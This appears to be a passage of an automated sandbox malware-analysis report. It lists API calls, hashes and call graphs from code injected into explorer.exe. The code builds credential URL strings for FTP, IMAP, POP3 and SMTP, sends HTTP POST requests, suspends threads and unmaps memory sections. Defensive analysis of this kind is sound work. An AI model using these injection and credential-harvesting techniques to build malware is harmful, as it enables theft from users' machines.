                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$getpeernamehtonsinet_ntoawsprintf
                            • String ID: ftp://%s:%s@%s:%d$imap://%s:%s@%s:%d$pop3://%s:%s@%s:%d$smtp://%s:%s@%s:%d
                            • API String ID: 3379139566-1703351401
                            • Opcode ID: f676f92af0c6ff66c5822e62ca56dfce190a0eeb9db384d4f5553db5fd7ce93e
                            • Instruction ID: 1977f45b700c9ebd3b160bc018f8a96e90c40a2d71f935381f291ae06dc5100c
                            • Opcode Fuzzy Hash: f676f92af0c6ff66c5822e62ca56dfce190a0eeb9db384d4f5553db5fd7ce93e
                            • Instruction Fuzzy Hash: C2218337E8030977DF115FA98D885BE7AAD9B55342B04C077E914D3331DA34CE419A61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • GetModuleHandleA.KERNEL32(ntdll.dll,sscanf,?,?,?,009D1539,?,?,?,009D144B,?), ref: 009D1763
                            • GetProcAddress.KERNEL32(00000000), ref: 009D176A
                            • RtlZeroMemory.NTDLL(009D4228,00000104), ref: 009D1788
                            • RtlZeroMemory.NTDLL(009D4118,00000104), ref: 009D1790
                            • RtlZeroMemory.NTDLL(009D4330,00000104), ref: 009D1798
                            • RtlZeroMemory.NTDLL(009D4000,00000104), ref: 009D17A1
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: MemoryZero$AddressHandleModuleProc
                            • String ID: %s%s%s%s$ntdll.dll$sscanf
                            • API String ID: 1490332519-278825019
                            • Opcode ID: 55044c69446e0a667f1532d856378e7892a75e6c65e0c55c6a1cb80823939a81
                            • Instruction ID: 309b9c04b7cbffc03bb3c04199ed2187d411486f03e2476f3ab3cf6a881532eb
                            • Opcode Fuzzy Hash: 55044c69446e0a667f1532d856378e7892a75e6c65e0c55c6a1cb80823939a81
                            • Instruction Fuzzy Hash: 70F01962BD532C37812023EAAC4AD5BBE5CC6D1FAF302C167B75463341D9B5694045B5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • GetCurrentProcessId.KERNEL32 ref: 009D24E7
                            • GetCurrentThreadId.KERNEL32 ref: 009D24EF
                            • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 009D24FF
                            • Thread32First.KERNEL32(00000000,0000001C), ref: 009D250D
                            • OpenThread.KERNEL32(001FFFFF,00000000,?), ref: 009D252C
                            • SuspendThread.KERNEL32(00000000), ref: 009D253C
                            • CloseHandle.KERNEL32(00000000), ref: 009D254B
                            • Thread32Next.KERNEL32(00000000,0000001C), ref: 009D255B
                            • CloseHandle.KERNEL32(00000000), ref: 009D2566
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Thread$CloseCurrentHandleThread32$CreateFirstNextOpenProcessSnapshotSuspendToolhelp32
                            • String ID:
                            • API String ID: 1467098526-0
                            • Opcode ID: 50b8d967649124b2f449b9c3d8ca319b0fc9ad1a716550bb8d704a4a251f5107
                            • Instruction ID: 6fc5722c1653ecee895f5d4d84b151a4c3e3bce50cf7e49dc9d0233adbeb4323
                            • Opcode Fuzzy Hash: 50b8d967649124b2f449b9c3d8ca319b0fc9ad1a716550bb8d704a4a251f5107
                            • Instruction Fuzzy Hash: A11156B149E201EFD7019F60EC4CB6EBBA8FF55702F04C52BF54192150D7348A85ABA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                              • Part of subcall function 009D2861: GetProcessHeap.KERNEL32(00000008,0000A000,009D10CC), ref: 009D2864
                              • Part of subcall function 009D2861: RtlAllocateHeap.NTDLL(00000000), ref: 009D286B
                              • Part of subcall function 009D27E2: lstrlen.KERNEL32(009D40DA,?,00000000,00000000,009D1F86,772D81D0,009D40DA,00000000), ref: 009D27EA
                              • Part of subcall function 009D27E2: MultiByteToWideChar.KERNEL32(00000000,00000000,009D40DA,00000001,00000000,00000000), ref: 009D27FC
                              • Part of subcall function 009D2374: RtlZeroMemory.NTDLL(?,00000018), ref: 009D2386
                            • RtlZeroMemory.NTDLL(?,0000003C), ref: 009D1FE2
                            • wsprintfW.USER32 ref: 009D211B
                            • wsprintfW.USER32 ref: 009D2186
                            • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 009D2250
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Memory$HeapZerowsprintf$AllocateByteCharMoveMultiProcessWidelstrlen
                            • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$Host: %s$POST
                            • API String ID: 4204651544-1701262698
                            • Opcode ID: e8b556d581b936cc2495ee0e3f42c3582490e128a9a09439cec98cca29136158
                            • Instruction ID: 63093a23fbf7d3670b996d302e971b0ecf4441305d2181b3a8519f056c7b5dd5
                            • Opcode Fuzzy Hash: e8b556d581b936cc2495ee0e3f42c3582490e128a9a09439cec98cca29136158
                            • Instruction Fuzzy Hash: 56A18B7164D305AFD3109FA8C885A2BBBE8FFD8341F10882EF995D3361DA70DA449B52
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • OpenProcess.KERNEL32(00000400,00000000,?,77296900,?,?,microsoftedgecp.exe,009D1287), ref: 009D25BF
                            • IsWow64Process.KERNEL32(000000FF,?), ref: 009D25D1
                            • IsWow64Process.KERNEL32(00000000,?), ref: 009D25E4
                            • CloseHandle.KERNEL32(00000000), ref: 009D25FA
                            Strings
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$Wow64$CloseHandleOpen
                            • String ID: microsoftedgecp.exe
                            • API String ID: 331459951-1475183003
                            • Opcode ID: 4aab45a8f416b5b1e11049b180f5741f727417f61291f15bb8b672c72f339d2b
                            • Instruction ID: 95fd1b2b5f62ea6d43132182baa421b697691cd3e03fd65422de274e9682a15d
                            • Opcode Fuzzy Hash: 4aab45a8f416b5b1e11049b180f5741f727417f61291f15bb8b672c72f339d2b
                            • Instruction Fuzzy Hash: 9EF0907199A318FF9B10CF90ED88CEE776CEB11252B54826BF90092240D7318F44F6A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • RtlMoveMemory.NTDLL(?,?,?), ref: 009D1B4E
                            • LoadLibraryA.KERNEL32(?,009D4434,00000000,00000000,772EF560,00000000,009D1910,?,?,?,00000001,?,00000000), ref: 009D1B76
                            • GetProcAddress.KERNEL32(00000000,-00000002), ref: 009D1BA3
                            • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 009D1BF4
                            Memory Dump Source
                            • Source File: 0000000C.00000002.507826700.00000000009D1000.00000040.80000000.00040000.00000000.sdmp, Offset: 009D1000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_12_2_9d1000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                            • String ID:
                            • API String ID: 3827878703-0
                            • Opcode ID: 774dbccb1e58efce6fe192005bc9165d4edb1e28c667af10e59210dfb87bb195
                            • Instruction ID: d324bd97c70f969ff51bf7eed2b25c3794ccaf6d4d840ff8db73f247ba6c1480
                            • Opcode Fuzzy Hash: 774dbccb1e58efce6fe192005bc9165d4edb1e28c667af10e59210dfb87bb195
                            • Instruction Fuzzy Hash: 3F31A376784216BBCB24CF29C984776B7E8EF05315B14856FE886C7300E735E885CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage:8.8%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:0%
                            Total number of Nodes:9
                            Total number of Limit Nodes:2

                            Callgraph


                            Control-flow Graph

                            APIs
                            • NtUnmapViewOfSection.NTDLL ref: 00F435D8
                            Memory Dump Source
                            • Source File: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F41000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_f41000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: SectionUnmapView
                            • String ID:
                            • API String ID: 498011366-0
                            • Opcode ID: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                            • Instruction ID: 30fcf116df5c33705d975b6b9cc33862961f4d87d838d39890eb7c4d24697fe8
                            • Opcode Fuzzy Hash: 105ce7ebc966886b9a25723169f2257f301d4275c672492e635fc8e478682f43
                            • Instruction Fuzzy Hash: 19119430A15E095FFB58FBB8989D6793BA0FB54311F58012AAC19C76A1EA3D8A40D701
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 0000000D.00000002.507736401.0000000000F41000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F41000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_f41000_explorer.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSleepSnapshotToolhelp32lstrcmpi
                            • String ID:
                            • API String ID: 2313719238-0
                            • Opcode ID: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                            • Instruction ID: ca19f809ca8be4555baf5b66556dbd525246b6fa8b4c0c286f6f7021d26c0895
                            • Opcode Fuzzy Hash: dd7379c30c01fbe83c455f487028ed93214d04d4b8b4672215a43173641bdad8
                            • Instruction Fuzzy Hash: D88133316186098FE71AEF54EC58BEABBA1FB50750F54462AA443C7170EF78DA08DF81
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNELBASE ref: 00F4A147
                            • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-0000000E), ref: 00F4A1BB
                            • VirtualProtect.KERNELBASE ref: 00F4A1D9
                            Memory Dump Source
                            • Source File: 0000000D.00000002.507878444.0000000000F47000.00000040.80000000.00040000.00000000.sdmp, Offset: 00F47000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_f47000_explorer.jbxd
                            Similarity
                            • API ID: ProtectVirtual$LibraryLoad
                            • String ID:
                            • API String ID: 895956442-0
                            • Opcode ID: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                            • Instruction ID: 7b647932b82b77293684bd8df66873a4ab7a35ebac6e050c393798179ed0ff6d
                            • Opcode Fuzzy Hash: 9471cbd89cfacdc20873a06991d91791c754b160c08a2600c3720216ed5fc549
                            • Instruction Fuzzy Hash: 2E51AC327D891D0BCB24AA3C9CC07F5BFC1E799335F18072AD88AC3284E959D8469783
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Execution Graph

                            Execution Coverage: 3.3%
                            Dynamic/Decrypted Code Coverage: 22.3%
                            Signature Coverage: 7%
                            Total number of Nodes: 914
                            Total number of Limit Nodes: 18
                            execution_graph 7808 3aaab2 7809 3aaabf 7808->7809 7814 3a8d51 7809->7814 7812 3a8d51 __calloc_crt 58 API calls 7813 3aaaf2 7812->7813 7815 3a8d58 7814->7815 7817 3a8d93 7815->7817 7819 3a8d76 7815->7819 7820 3aaeb8 7815->7820 7817->7812 7817->7813 7819->7815 7819->7817 7828 3a8d18 Sleep 7819->7828 7821 3aaede 7820->7821 7822 3aaec3 7820->7822 7825 3aaeee RtlAllocateHeap 7821->7825 7826 3aaed4 7821->7826 7832 3aa6f5 RtlDecodePointer 7821->7832 7822->7821 7823 3aaecf 7822->7823 7829 3a9230 7823->7829 7825->7821 7825->7826 7826->7815 7828->7819 7834 3a7bbb GetLastError 7829->7834 7831 3a9235 7831->7826 7833 3aa708 7832->7833 7833->7821 7848 3a89de 7834->7848 7836 3a7bd0 7837 3a7c1e SetLastError 7836->7837 7838 3a8d51 __calloc_crt 55 API calls 7836->7838 7837->7831 7839 3a7be3 7838->7839 7839->7837 7851 3a89fd 7839->7851 7841 3a7bf7 7842 3a7bfd 7841->7842 7843 3a7c15 7841->7843 7854 3a7c2a 7842->7854 7864 3a8840 7843->7864 7846 3a7c05 GetCurrentThreadId 7846->7837 7847 3a7c1b 7847->7837 7849 3a89f1 7848->7849 7850 3a89f5 TlsGetValue 7848->7850 7849->7836 7850->7836 7852 3a8a17 TlsSetValue 7851->7852 7853 3a8a13 7851->7853 7852->7841 7853->7841 7855 3a7c36 __initptd 7854->7855 7870 3aa06e 7855->7870 7857 3a7c73 7877 3a7ccb 7857->7877 7860 3aa06e __lock 58 API calls 7861 3a7c94 ___addlocaleref 7860->7861 7880 3a7cd4 7861->7880 7863 3a7cbf __initptd 7863->7846 7865 3a8849 HeapFree 7864->7865 7866 3a8872 __dosmaperr 7864->7866 7865->7866 7867 3a885e 7865->7867 7866->7847 7868 3a9230 __cftof_l 56 API calls 7867->7868 7869 3a8864 GetLastError 7868->7869 7869->7866 7871 3aa07f 7870->7871 7872 3aa092 RtlEnterCriticalSection 7870->7872 7883 3aa0f6 7871->7883 7872->7857 7874 3aa085 7874->7872 7905 3a7f79 7874->7905 8106 3aa1d8 RtlLeaveCriticalSection 7877->8106 7879 3a7c8d 7879->7860 8107 3aa1d8 RtlLeaveCriticalSection 7880->8107 7882 3a7cdb 7882->7863 7884 3aa102 __initptd 7883->7884 7896 3aa121 7884->7896 7912 3aa1ed 7884->7912 7891 3aa14e 7895 
3aa06e __lock 58 API calls 7891->7895 7892 3aa13f 7894 3a9230 __cftof_l 58 API calls 7892->7894 7897 3aa144 __initptd 7894->7897 7898 3aa155 7895->7898 7896->7897 7954 3a8d99 7896->7954 7897->7874 7899 3aa17a 7898->7899 7900 3aa162 7898->7900 7901 3a8840 _free 58 API calls 7899->7901 7960 3a8a1f 7900->7960 7903 3aa16e 7901->7903 7963 3aa196 7903->7963 7906 3aa1ed __FF_MSGBANNER 58 API calls 7905->7906 7907 3a7f81 7906->7907 7908 3aa24a __NMSG_WRITE 58 API calls 7907->7908 7909 3a7f89 7908->7909 8077 3a8028 7909->8077 7966 3ae05a 7912->7966 7914 3aa1f4 7915 3aa201 7914->7915 7916 3ae05a __NMSG_WRITE 58 API calls 7914->7916 7917 3aa24a __NMSG_WRITE 58 API calls 7915->7917 7919 3aa110 7915->7919 7916->7915 7918 3aa219 7917->7918 7920 3aa24a __NMSG_WRITE 58 API calls 7918->7920 7921 3aa24a 7919->7921 7920->7919 7922 3aa268 __NMSG_WRITE 7921->7922 7924 3ae05a __NMSG_WRITE 55 API calls 7922->7924 7950 3aa38f 7922->7950 7926 3aa27b 7924->7926 7925 3aa117 7951 3a7e56 7925->7951 7927 3aa394 GetStdHandle 7926->7927 7928 3ae05a __NMSG_WRITE 55 API calls 7926->7928 7931 3aa3a2 _strlen 7927->7931 7927->7950 7929 3aa28c 7928->7929 7929->7927 7930 3aa29e 7929->7930 7930->7950 7976 3ad330 7930->7976 7933 3aa3db WriteFile 7931->7933 7931->7950 7933->7950 7935 3aa2cb GetModuleFileNameW 7937 3aa2eb 7935->7937 7943 3aa2fb __NMSG_WRITE 7935->7943 7936 3aa3fc 8035 3a91d1 IsProcessorFeaturePresent 7936->8035 7939 3ad330 __NMSG_WRITE 55 API calls 7937->7939 7939->7943 7941 3aa341 7941->7936 7994 3ad2c4 7941->7994 7943->7936 7943->7941 7985 3ad3a5 7943->7985 7946 3ad2c4 __NMSG_WRITE 55 API calls 7947 3aa378 7946->7947 7947->7936 7948 3aa37f 7947->7948 8003 3ae09a RtlEncodePointer 7948->8003 8028 3aaf32 7950->8028 8055 3a7e22 GetModuleHandleExW 7951->8055 7957 3a8da7 7954->7957 7956 3a8dd9 7956->7891 7956->7892 7957->7956 7959 3a8dba 7957->7959 8058 3aad7b 7957->8058 7959->7956 7959->7957 8075 3a8d18 Sleep 7959->8075 7961 3a8a2f 7960->7961 7962 3a8a3c InitializeCriticalSectionAndSpinCount 
7960->7962 7961->7903 7962->7903 8076 3aa1d8 RtlLeaveCriticalSection 7963->8076 7965 3aa19d 7965->7897 7967 3ae064 7966->7967 7968 3ae06e 7967->7968 7969 3a9230 __cftof_l 58 API calls 7967->7969 7968->7914 7970 3ae08a 7969->7970 7973 3a91c1 7970->7973 7974 3a9196 __cftof_l 9 API calls 7973->7974 7975 3a91cd 7974->7975 7975->7914 7977 3ad33b 7976->7977 7978 3ad349 7976->7978 7977->7978 7980 3ad362 7977->7980 7979 3a9230 __cftof_l 58 API calls 7978->7979 7984 3ad353 7979->7984 7982 3aa2be 7980->7982 7983 3a9230 __cftof_l 58 API calls 7980->7983 7981 3a91c1 __cftof_l 9 API calls 7981->7982 7982->7935 7982->7936 7983->7984 7984->7981 7989 3ad3b3 7985->7989 7986 3ad3b7 7987 3ad3bc 7986->7987 7988 3a9230 __cftof_l 58 API calls 7986->7988 7987->7941 7990 3ad3e7 7988->7990 7989->7986 7989->7987 7992 3ad3f6 7989->7992 7991 3a91c1 __cftof_l 9 API calls 7990->7991 7991->7987 7992->7987 7993 3a9230 __cftof_l 58 API calls 7992->7993 7993->7990 7995 3ad2de 7994->7995 7997 3ad2d0 7994->7997 7996 3a9230 __cftof_l 58 API calls 7995->7996 8002 3ad2e8 7996->8002 7997->7995 8000 3ad30a 7997->8000 7998 3a91c1 __cftof_l 9 API calls 7999 3aa361 7998->7999 7999->7936 7999->7946 8000->7999 8001 3a9230 __cftof_l 58 API calls 8000->8001 8001->8002 8002->7998 8004 3ae0ce ___crtIsPackagedApp 8003->8004 8005 3ae18d IsDebuggerPresent 8004->8005 8006 3ae0dd LoadLibraryExW 8004->8006 8007 3ae1b2 8005->8007 8008 3ae197 8005->8008 8009 3ae11a GetProcAddress 8006->8009 8010 3ae0f4 GetLastError 8006->8010 8012 3ae1a5 8007->8012 8013 3ae1b7 RtlDecodePointer 8007->8013 8011 3ae19e OutputDebugStringW 8008->8011 8008->8012 8015 3ae12e 7 API calls 8009->8015 8016 3ae1aa 8009->8016 8014 3ae103 LoadLibraryExW 8010->8014 8010->8016 8011->8012 8012->8016 8021 3ae1de RtlDecodePointer RtlDecodePointer 8012->8021 8025 3ae1f6 8012->8025 8013->8016 8014->8009 8014->8016 8017 3ae18a 8015->8017 8018 3ae176 GetProcAddress RtlEncodePointer 8015->8018 8019 3aaf32 __cftof_l 6 API calls 8016->8019 8017->8005 8018->8017 
8022 3ae27c 8019->8022 8020 3ae22e RtlDecodePointer 8023 3ae235 8020->8023 8027 3ae21a RtlDecodePointer 8020->8027 8021->8025 8022->7950 8026 3ae246 RtlDecodePointer 8023->8026 8023->8027 8025->8020 8025->8027 8026->8027 8027->8016 8029 3aaf3a 8028->8029 8030 3aaf3c IsProcessorFeaturePresent 8028->8030 8029->7925 8032 3acb8b 8030->8032 8041 3acb3a IsDebuggerPresent 8032->8041 8036 3a91dc 8035->8036 8047 3a9064 8036->8047 8040 3a91f7 8042 3acb4f ___raise_securityfailure 8041->8042 8043 3a8d3b ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 8042->8043 8045 3acb57 ___raise_securityfailure 8043->8045 8044 3a8d26 __invoke_watson GetCurrentProcess TerminateProcess 8046 3acb74 8044->8046 8045->8044 8046->7925 8048 3a907e ___raise_securityfailure _memset 8047->8048 8049 3a909e IsDebuggerPresent 8048->8049 8050 3a8d3b ___raise_securityfailure SetUnhandledExceptionFilter UnhandledExceptionFilter 8049->8050 8051 3a9162 ___raise_securityfailure 8050->8051 8052 3aaf32 __cftof_l 6 API calls 8051->8052 8053 3a9185 8052->8053 8054 3a8d26 GetCurrentProcess TerminateProcess 8053->8054 8054->8040 8056 3a7e3b GetProcAddress 8055->8056 8057 3a7e4d ExitProcess 8055->8057 8056->8057 8059 3aadf6 8058->8059 8065 3aad87 8058->8065 8060 3aa6f5 _malloc RtlDecodePointer 8059->8060 8061 3aadfc 8060->8061 8062 3a9230 __cftof_l 57 API calls 8061->8062 8074 3aadee 8062->8074 8063 3aa1ed __FF_MSGBANNER 57 API calls 8068 3aad92 8063->8068 8064 3aadba RtlAllocateHeap 8064->8065 8064->8074 8065->8064 8067 3aade2 8065->8067 8065->8068 8069 3aa6f5 _malloc RtlDecodePointer 8065->8069 8072 3aade0 8065->8072 8066 3aa24a __NMSG_WRITE 57 API calls 8066->8068 8070 3a9230 __cftof_l 57 API calls 8067->8070 8068->8063 8068->8065 8068->8066 8071 3a7e56 _malloc 3 API calls 8068->8071 8069->8065 8070->8072 8071->8068 8073 3a9230 __cftof_l 57 API calls 8072->8073 8073->8074 8074->7957 8075->7959 8076->7965 8080 3a80de 8077->8080 8079 3a7f94 8081 3a80ea __initptd 8080->8081 8082 3aa06e 
__lock 51 API calls 8081->8082 8083 3a80f1 8082->8083 8085 3a811f RtlDecodePointer 8083->8085 8087 3a81aa __cinit 8083->8087 8085->8087 8088 3a8136 RtlDecodePointer 8085->8088 8100 3a81f8 8087->8100 8093 3a8146 8088->8093 8089 3a8207 __initptd 8089->8079 8091 3a8153 RtlEncodePointer 8091->8093 8092 3a81ef 8094 3a7e56 _malloc 3 API calls 8092->8094 8093->8087 8093->8091 8095 3a8163 RtlDecodePointer RtlEncodePointer 8093->8095 8096 3a81f8 8094->8096 8098 3a8175 RtlDecodePointer RtlDecodePointer 8095->8098 8097 3a8205 8096->8097 8105 3aa1d8 RtlLeaveCriticalSection 8096->8105 8097->8079 8098->8093 8101 3a81fe 8100->8101 8102 3a81d8 8100->8102 8103 3aa1d8 _doexit RtlLeaveCriticalSection 8101->8103 8102->8089 8104 3aa1d8 RtlLeaveCriticalSection 8102->8104 8103->8102 8104->8092 8105->8097 8106->7879 8107->7882 7804 3c5a1c 7806 3c59c7 7804->7806 7805 3c5c40 VirtualProtect VirtualProtect 7807 3c5c09 7805->7807 7806->7805 7806->7807 8108 3a76e1 8109 3a76ea 8108->8109 8110 3a76ef 8108->8110 8126 3a8878 8109->8126 8114 3a7704 8110->8114 8113 3a76fd 8116 3a7710 __initptd 8114->8116 8115 3a775e 8119 3a77bb __initptd 8115->8119 8178 3a1ef7 8115->8178 8116->8115 8116->8119 8130 3a756f 8116->8130 8119->8113 8121 3a7798 8121->8119 8122 3a756f __CRT_INIT@12 137 API calls 8121->8122 8122->8119 8123 3a1ef7 ___DllMainCRTStartup 137 API calls 8124 3a778e 8123->8124 8125 3a756f __CRT_INIT@12 137 API calls 8124->8125 8125->8121 8127 3a889b 8126->8127 8128 3a88a8 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8126->8128 8127->8128 8129 3a889f 8127->8129 8128->8129 8129->8110 8131 3a757b __initptd 8130->8131 8132 3a75fd 8131->8132 8133 3a7583 8131->8133 8135 3a7601 8132->8135 8136 3a7666 8132->8136 8182 3a820d GetProcessHeap 8133->8182 8140 3a7622 8135->8140 8167 3a758c __initptd __CRT_INIT@12 8135->8167 8283 3a7f95 8135->8283 8138 3a766b 8136->8138 8139 3a76c9 8136->8139 8137 3a7588 8137->8167 8183 3a7cdd 8137->8183 8141 3a89de __freeptd TlsGetValue 
8138->8141 8139->8167 8314 3a7b6d 8139->8314 8286 3a7e6c RtlDecodePointer 8140->8286 8145 3a7676 8141->8145 8148 3a8d51 __calloc_crt 58 API calls 8145->8148 8145->8167 8147 3a7598 __RTC_Initialize 8155 3a75a8 GetCommandLineA 8147->8155 8147->8167 8152 3a7687 8148->8152 8150 3a7638 __CRT_INIT@12 8310 3a7651 8150->8310 8156 3a89fd __freeptd TlsSetValue 8152->8156 8152->8167 8153 3a84de __ioterm 59 API calls 8154 3a7633 8153->8154 8157 3a7d53 __mtterm 61 API calls 8154->8157 8204 3a8914 GetEnvironmentStringsW 8155->8204 8159 3a769f 8156->8159 8157->8150 8161 3a76bd 8159->8161 8162 3a76a5 8159->8162 8164 3a8840 _free 58 API calls 8161->8164 8166 3a7c2a __initptd 58 API calls 8162->8166 8164->8167 8165 3a75c2 8168 3a75c6 8165->8168 8236 3a8530 8165->8236 8169 3a76ad GetCurrentThreadId 8166->8169 8167->8115 8269 3a7d53 8168->8269 8169->8167 8173 3a75e6 8173->8167 8278 3a84de 8173->8278 8179 3a1efe 8178->8179 8180 3a1f07 8178->8180 8672 3a1ebe 8179->8672 8180->8121 8180->8123 8182->8137 8322 3a803c RtlEncodePointer 8183->8322 8185 3a7ce2 8328 3aa19f 8185->8328 8188 3a7ceb 8189 3a7d53 __mtterm 61 API calls 8188->8189 8191 3a7cf0 8189->8191 8191->8147 8193 3a7d08 8194 3a8d51 __calloc_crt 58 API calls 8193->8194 8195 3a7d15 8194->8195 8196 3a7d4a 8195->8196 8197 3a89fd __freeptd TlsSetValue 8195->8197 8198 3a7d53 __mtterm 61 API calls 8196->8198 8200 3a7d29 8197->8200 8199 3a7d4f 8198->8199 8199->8147 8200->8196 8201 3a7d2f 8200->8201 8202 3a7c2a __initptd 58 API calls 8201->8202 8203 3a7d37 GetCurrentThreadId 8202->8203 8203->8147 8205 3a8927 WideCharToMultiByte 8204->8205 8209 3a75b8 8204->8209 8207 3a895a 8205->8207 8208 3a8991 FreeEnvironmentStringsW 8205->8208 8210 3a8d99 __malloc_crt 58 API calls 8207->8210 8208->8209 8217 3a822a 8209->8217 8211 3a8960 8210->8211 8211->8208 8212 3a8967 WideCharToMultiByte 8211->8212 8213 3a897d 8212->8213 8214 3a8986 FreeEnvironmentStringsW 8212->8214 8215 3a8840 _free 58 API calls 8213->8215 8214->8209 8216 3a8983 8215->8216 
8216->8214 8218 3a8236 __initptd 8217->8218 8219 3aa06e __lock 58 API calls 8218->8219 8220 3a823d 8219->8220 8221 3a8d51 __calloc_crt 58 API calls 8220->8221 8222 3a824e 8221->8222 8223 3a82b9 GetStartupInfoW 8222->8223 8224 3a8259 __initptd @_EH4_CallFilterFunc@8 8222->8224 8225 3a83fd 8223->8225 8232 3a82ce 8223->8232 8224->8165 8226 3a84c5 8225->8226 8229 3a844a GetStdHandle 8225->8229 8231 3a845d GetFileType 8225->8231 8235 3a8a1f __ioinit InitializeCriticalSectionAndSpinCount 8225->8235 8337 3a84d5 8226->8337 8228 3a8d51 __calloc_crt 58 API calls 8228->8232 8229->8225 8230 3a831c 8230->8225 8233 3a8350 GetFileType 8230->8233 8234 3a8a1f __ioinit InitializeCriticalSectionAndSpinCount 8230->8234 8231->8225 8232->8225 8232->8228 8232->8230 8233->8230 8234->8230 8235->8225 8237 3a853e 8236->8237 8238 3a8543 GetModuleFileNameA 8236->8238 8347 3a95de 8237->8347 8240 3a8570 8238->8240 8341 3a85e3 8240->8341 8243 3a8d99 __malloc_crt 58 API calls 8244 3a85a9 8243->8244 8245 3a85e3 _parse_cmdline 58 API calls 8244->8245 8246 3a75d2 8244->8246 8245->8246 8246->8173 8247 3a875f 8246->8247 8248 3a8768 8247->8248 8250 3a876d _strlen 8247->8250 8249 3a95de ___initmbctable 70 API calls 8248->8249 8249->8250 8251 3a8d51 __calloc_crt 58 API calls 8250->8251 8254 3a75db 8250->8254 8259 3a87a3 _strlen 8251->8259 8252 3a87f5 8253 3a8840 _free 58 API calls 8252->8253 8253->8254 8254->8173 8263 3a7fa4 8254->8263 8255 3a8d51 __calloc_crt 58 API calls 8255->8259 8256 3a881c 8258 3a8840 _free 58 API calls 8256->8258 8258->8254 8259->8252 8259->8254 8259->8255 8259->8256 8260 3a8833 8259->8260 8551 3aac98 8259->8551 8261 3a91d1 __invoke_watson 8 API calls 8260->8261 8262 3a883f 8261->8262 8264 3a7fb0 __IsNonwritableInCurrentImage 8263->8264 8560 3aa691 8264->8560 8266 3a7fce __initterm_e 8268 3a7fed __cinit __IsNonwritableInCurrentImage 8266->8268 8563 3aa67c 8266->8563 8268->8173 8270 3a7d63 8269->8270 8271 3a7d5d 8269->8271 8273 3aa0d4 8270->8273 8274 3aa0b8 RtlDeleteCriticalSection 
